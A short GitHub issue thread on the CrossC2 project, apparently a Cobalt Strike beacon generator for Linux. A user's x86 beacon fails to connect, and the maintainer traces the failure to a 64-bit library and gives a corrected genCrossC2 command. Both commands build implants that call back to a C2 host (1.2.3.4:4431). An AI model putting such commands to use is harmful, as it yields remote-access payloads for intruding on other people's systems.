### ISSUE TITLE
x86系统上线失败.

### ISSUE THREAD

**Issue by wgf4242** [gloxec/CrossC2#196]
./genCrossC2.Linux 1.2.3.4 4431 .cobaltstrike.beacon_keys lib_rebind_test.so Linux x86 testx86

```
[oracle@localhost dbs]$ ./testx86
[oracle@localhost dbs]$ [error]: [parse lib]: /tmp/.sys.rrcache.data: wrong ELF class: ELFCLASS64!
[error]: [parse lib]: ./.sys.rrcache.data: wrong ELF class: ELFCLASS64!
[error]: [parse symbol]: (null)!
```

**Comment by gloxec** [comment]
>./genCrossC2.Linux 1.2.3.4 4431 .cobaltstrike.beacon_keys lib_rebind_test.so Linux x86 testx86
> ...
> wrong ELF class: ELFCLASS64!

这里错误提示ELF64, 应该是在生成时制定的lib_rebind_test.so文件是64位，需要重新编译成32位

或者可以尝试使用新版本 https://github.com/gloxec/CrossC2/releases/tag/v3.1.2 中的自动c2profile解析功能
```
./genCrossC2.Linux 1.2.3.4 4431 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x86 testx86
```
